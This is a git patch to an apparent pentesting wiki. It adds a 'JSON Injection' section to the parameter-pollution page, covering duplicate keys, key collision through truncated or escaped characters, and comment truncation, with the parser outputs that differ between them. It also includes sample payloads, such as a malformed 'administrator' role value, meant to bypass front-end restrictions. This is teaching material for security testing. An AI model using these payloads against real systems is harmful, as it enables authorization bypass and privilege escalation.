From 42b2b7ec0533a6fef96611d6982537f88703d731 Mon Sep 17 00:00:00 2001 From: CPol Date: Tue, 12 Nov 2024 12:17:34 +0000 Subject: [PATCH] GITBOOK-4429: No subject --- SUMMARY.md | 2 +- pentesting-web/parameter-pollution.md | 105 +++++++++++++++++++++++++- 2 files changed, 105 insertions(+), 2 deletions(-) diff --git a/SUMMARY.md b/SUMMARY.md index 60279767a..0103b2fa9 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -604,7 +604,7 @@ * [OAuth to Account takeover](pentesting-web/oauth-to-account-takeover.md) * [Open Redirect](pentesting-web/open-redirect.md) * [ORM Injection](pentesting-web/orm-injection.md) -* [Parameter Pollution](pentesting-web/parameter-pollution.md) +* [Parameter Pollution | JSON Injection](pentesting-web/parameter-pollution.md) * [Phone Number Injections](pentesting-web/phone-number-injections.md) * [PostMessage Vulnerabilities](pentesting-web/postmessage-vulnerabilities/README.md) * [Blocking main page to steal postmessage](pentesting-web/postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md) diff --git a/pentesting-web/parameter-pollution.md b/pentesting-web/parameter-pollution.md index 3a835e647..7b6f55683 100644 --- a/pentesting-web/parameter-pollution.md +++ b/pentesting-web/parameter-pollution.md @@ -1,4 +1,4 @@ -# Parameter Pollution +# Parameter Pollution | JSON Injection ## Parameter Pollution @@ -136,11 +136,114 @@ There results were taken from [https://medium.com/@0xAwali/http-parameter-pollut 1. NOT Recognized name\[] . 2. Prefer the last parameter . +## JSON Injection + +### Duplicate keys + +```ini +obj = {"test": "user", "test": "admin"} +``` + +The front-end might believe the first ocurrence while the backend uses the second ocurrence of the key. + +### Key Collision: Character Truncation and Comments + +Certain characters aren't going to be correctly interpreted by the frontend but the backend will interpret them and use those keys, this could be useful to **bypass certain restrictions**: + +```json +{"test": 1, "test\[raw \x0d byte]": 2} +{"test": 1, "test\ud800": 2} +{"test": 1, "test"": 2} +{"test": 1, "te\st": 2} +``` + +Note how in these cases the front end might think that `test == 1` and the backend will think that `test == 2`. + +This can also by used to bypass value restrictions like: + +```json +{"role": "administrator\[raw \x0d byte]"} +{"role":"administrator\ud800"} +{"role": "administrator""} +{"role": "admini\strator"} +``` + +### **Using Comment Truncation** + +{% code overflow="wrap" %} +```ini +obj = {"description": "Duplicate with comments", "test": 2, "extra": /*, "test": 1, "extra2": */} +``` +{% endcode %} + +Here we will use the serializer from each parser to view its respective output. + +Serializer 1 (e.g., GoLang's GoJay library) will produce: + +* `description = "Duplicate with comments"` +* `test = 2` +* `extra = ""` + +Serializer 2 (e.g., Java's JSON-iterator library) will produce: + +* `description = "Duplicate with comments"` +* `extra = "/*"` +* `extra2 = "*/"` +* `test = 1` + +Alternatively, straightforward use of comments can also be effective: + +```ini +obj = {"description": "Comment support", "test": 1, "extra": "a"/*, "test": 2, "extra2": "b"*/} +``` + +Java’s GSON library: + +```json +{"description":"Comment support","test":1,"extra":"a"} +``` + +Ruby’s simdjson library: + +```json +{"description":"Comment support","test":2,"extra":"a","extra2":"b"} +``` + +### **Inconsistent Precedence: Deserialization vs. Serialization** + +```ini +obj = {"test": 1, "test": 2} + +obj["test"] // 1 +obj.toString() // {"test": 2} +``` + +### Float and Integer + +The number + +```undefined +999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 +``` + +can be decoded to multiple representations, including: + +```undefined +999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 +9.999999999999999e95 +1E+96 +0 +9223372036854775807 +``` + +Which might create inconsistences + ## References * [https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654](https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654) * [https://github.com/google/google-ctf/tree/master/2023/web-under-construction/solution](https://github.com/google/google-ctf/tree/master/2023/web-under-construction/solution) * [https://medium.com/@0xAwali/http-parameter-pollution-in-2024-32ec1b810f89](https://medium.com/@0xAwali/http-parameter-pollution-in-2024-32ec1b810f89) +* [https://bishopfox.com/blog/json-interoperability-vulnerabilities](https://bishopfox.com/blog/json-interoperability-vulnerabilities)